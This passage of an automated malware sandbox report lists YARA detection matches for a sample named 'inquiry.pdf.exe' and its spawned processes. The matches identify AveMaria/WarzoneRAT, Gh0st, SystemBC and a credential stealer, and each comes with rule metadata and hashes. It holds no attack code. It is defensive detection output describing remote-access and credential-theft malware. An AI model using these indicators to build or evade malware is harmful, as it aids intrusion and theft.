Source: Yara match File source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.3.AddInProcess32.exe.ea71c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.3.AddInProcess32.exe.ea71c8.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.3.AddInProcess32.exe.e95278.8.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.3.AddInProcess32.exe.e95278.8.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.3.AddInProcess32.exe.ea6d50.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.3.AddInProcess32.exe.ea6d50.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.3.AddInProcess32.exe.e95278.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.3.AddInProcess32.exe.e95278.4.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.3.AddInProcess32.exe.e95278.4.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: inquiry.pdf.exe
Uses 32bit PE files
Source: inquiry.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.3.AddInProcess32.exe.ea71c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea71c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.3.AddInProcess32.exe.ea71c8.10.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea71c8.10.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
